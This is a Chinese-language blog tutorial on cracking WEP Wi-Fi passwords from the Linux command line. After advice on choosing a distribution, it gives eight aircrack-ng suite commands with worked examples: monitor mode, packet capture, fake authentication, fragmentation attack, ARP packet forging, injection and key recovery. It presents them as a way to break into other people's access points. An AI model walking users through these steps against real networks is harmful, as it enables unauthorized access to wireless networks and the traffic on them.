Linux命令行下通用WEP密码破解(也可非BT平台)

Tags: 安全

看到网络上很多教程,虽说都是面向我们这种"菜鸟",可往往几条操作了事,没有说明,这里我结合自己的实际情况写一点步骤,不是完全原创,但尽量把一些可能遇到的情况说明到,希望对大家有帮助。

首先是平台选择的问题,网上推荐都是基于LINUX的BT3/4.BT系列很强大,但我感觉有些误解,而且有为USB网卡做广告嫌疑
一是BT太强大,不仅仅是无线破解这么一点点功能,蓝牙,网络等很多安全工具,只要肯研究,会有很多发现,网上把BT的功能多少有些歪曲了.BT3 和BT4界面相同,但实质不太一样,bt3基于slax,而同样基于slax还有wifislax等.bt4基于ubuntu,而同样基于ubuntu的 还有nubuntu等.有些操作命令不太一样,所以如果失败的时候注意一下是不是系统选择错了,眼界放宽些,不要就盯着BT不放,呵呵.

其次是BT的缺点,它对硬件比较挑,特别是网卡以及显卡(搞不明白为什么显卡),如果系统都装不好以下的破解过程就算白说了。网卡代表是瑞银,驱动不好 弄.显卡代表是ATI,特别是ATI的宽屏笔记本,基本可以放弃了。如果能安装好BT最好,不能的话我给大家推荐几个,一是UBUNTU9.04(目前最 新是9.10),一是CDlinux-0.9.4-wireless(目前最新是0.95),还就是beini-1.0-rc5.1(目前最新,没怎么试 过)。选UBUNTU9.04是因为它对硬件适应性好,BT系列不能识别的网卡显卡它就有可能识别,不用为了仅破个WEP密码专门买USB网卡,而且还说 不定仍然不能识别!另外可以无痛简单的用“wubi”安装在硬盘上,如果有人尝试过wubi无法安装9.10(好象是grub引导式升级了)或用其他方法 硬盘安装好ubuntu双系统后恢复XP时mbr出现问题急得挠墙就会认同我的观点了...,具体点是xinyang-ubuntu-9.04- chinese-customize-release这个改版,也叫“新氧”。CDlinux0.94里有很多0.95里反倒没有的软件,不知道为什 么.0.95也有个别0.94没有的,所以我的建议是同时下载,然后把0.95里的“local”,“extra”文件夹里一些模块放入0.94里重新打 包为镜像文件,就可以集二者的优点了,0.95的一个特点就是把 “Beini”里的“feedingbottle”提取出来了,很方便。

系统选好了接着是安装,ubuntu“wubi”比较简单化,需要注意的是欲安装ubuntu的非系统盘设为NTFS格式,建新建文件夹,命名为 “iso”将镜像文件与安装文件一同放入iso文件夹,镜像文件xinyang-ubuntu-9.04-chinese-customize- release.iso重命名为installation.iso,wubi不要用官方,不然光下载镜像文件都能等到头发都白了...推荐“wubi- hd”这个改版.CDLinux可以直接解压到C盘,然后grub编辑一下“boot.ini”,“menu”后启动,但CDLinux缺点是操作后的内 容下次重启就没了,记得手动把有用的东西copy到其他非系统盘里,应该是系统本身的问题,不过如果把它仅作为无线破解就无所谓了

下面是重头戏,无线破解的具体步骤。我着重写命令行下,因为LINUX自由地太恶心,特别是软件安装,大家都随心所欲,结果反倒不自由了,以 “spoonwep”在不同系统下安装为典型代表,折腾死人。命令行很麻烦,但毕竟通用,而且懒人copy不难...

一共八条,下有解释。我在ubuntu下为例,事先最好“联网”的情况下命令行

“sudo apt-get install aircrack-ng”等一下,下载必须软件。CDLinux不用,但CDLinux命令行下好像不能copy,辛苦点手动吧。

1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) 重开终端,前面的不要关,aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) 重开终端,前面的不要关,aircrack-ng -n 64 -b ap_mac name-01.ivs

 

  1. ifconfig -a
    这个命令用于找到自己的无线网卡的 Mac地址,注意有线网卡一般是eth0,笔记本内置无线网卡可能是eth1,wifi0,wlan0等,安装虚拟机后还有虚拟机的虚拟网卡。usb网卡 也有自己的命名当初因为这么一点东西教程不提醒疑惑好久,我以wlan0为例

  2. airmon-ng start wifi0 6
    这个命令用于将自己的无线网卡置于Monitor 模式,即类似一个AP的效果,因此可以有抓别人包的功能。

第一个ifconfig -a命令可以看得到。wifi0 后面的那个6 ,是需要破解的AP的频道,最常见。还有可能是11,1等。运行命令成功以后,你会看到返回的提示显示出现一个 Ath1(如果你是 Athoes的无线网卡的话就是这个,其他的可能为mon0)这个就是你的用于破解的网卡代号。这个命令,简而言之,就是把你的无线网卡置于监控模式,并 且指定监控的频道。如果你发现弄错了频道,那么没关系,重新运行一遍就可以了,不过这个时候,可能就会变成 Ath2...Ath3 等等,但是好像最多运行三次,然后就会失败。

例:sudo airmon-ng start wlan0 6 显示如下


Interface    Chipset        Driver

mon0        Unknown     iwlagn – [phy0]
(monitor mode enabled on mon0            

6是指你需要监控的频道,必须和第二个命令里的一样, ath1是刚才第二步出现的别名。


3) airodump-ng --ivs -w name -c 6 ath1
3)这个命令比较关键,你运行以后,就会列出所有该频道的AP。“name”随便改,写成你名字也没关系
显示的内容比较多,简单介绍一下:
BSSID : 其实就是AP的Mac 地址
PWR: AP信号的大小,一般,低于10,就比较麻烦了,不过还不是没可能,我曾经见过负值...还可以出来
RXQ: 干扰的大小
Beacons:发送接受的包,参考信息,在跳说明有数据
#Data: 这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个跳的速度非常快,

10来分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用一些特殊的方式来破解了。破解一般数据要上万,不过不用怕,最夸张只要多等一会儿有2个以上就可以的(见后)
CH:频道
MB:网络连接速度 54就是54MB
ENC, CIPHER,AUTH
这些是加密方式,我们这次只讨论显示为 WEP 和 WEP+ OPN
ESSID: 这个是AP的名字,需要以后用到的。如果是中文貌似会出问题。因此为了阻挡别人破解,可以用中文的ESSID
这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口操作。

例:sudo airodump-ng --ivs -w name -c 6 mon0


4) 重开终端,前面的不要关,aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
4)“aireplay-ng”后的是数字1不是字母l,敲键盘的同志注意了。
这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往往需要很长的时间才有 可能取得足够的包,这个时候就需要 aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。

首先解释命令:
-e ap_essid ,“ap_essid”就是 -e 之后加上被破解的essid ,3步骤可见到,或者最简单windows下直接查看无线网络即可比如 TP-LINK , linksys ,注意大小写。
-a ap_mac ,  “ap_mac”就是 -a 之后加上你需要破解的AP的Mac地址,第三步BSSID就可以看得到。还有可能显示为"xx-xx","xx:xx"的形式,不需要“ :”或“-”哦。
-h XXXXXXXXXX 就是 -h 之后,加上你“自己”无线网卡的 Mac地址, 在第一步你可以得到。
如果成功了,那么会显示Successful :> 字样。否则,请让信号强度大于10。


例:aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 mon0

 


5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
5)这是一条命令的执行,和#data包有关,如果#Data 没有增加,则这个命令会一直执行,直到捕获一个#Data包。捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。如果攻击成功,则会显示成 功,失败往往是因为信号太差造成的, 如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或自动重新开始捕捉包,继续进行即可。等成功完成以后,会显示一个文件名:fragment- XXXXX-XXXXXX.xor这个文件名,XXXXX里面是数字,是一个文件。马上会用得到。这一步是最有可能失败的一步,尽量保持信号好一点。


例:  sudo aireplay-ng -5 -b 001900123456 -h 001900345678 mon0

 


6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
6)参数比较多,fragment-XXXXX-XXXXXX.xor 就是第五步显示的那个文件名。其余同前。
这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。

例:sudo packetforge-ng -0 -a 001900123456 -h 001900345678 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1226-122412.xor -w mrarp


7) aireplay-ng -2 -r mrarp -x 1024 ath1
7)ath1 是 你的无线网卡的名字,1024 是攻击速度,1024是最大值了,如果你的无线网卡不是MiniPCI的,个人建议设为 512 ,这样不容易死机。

当这一步开始执行,你会看到第一个终端窗口里面,你破解的那个AP后面的 #Data在飞速增长!(成功的前兆)一般是 200~400个/s的速度,只需等待即可

例:sudo aireplay-ng -2 -r mrarp -x 51

   

本文链接:http://www.4byte.cn/learning/53375/linux-ming-ling-xing-xia-tong-yong-wep-mi-ma-po-jie-ye-ke-fei-bt-ping-tai.html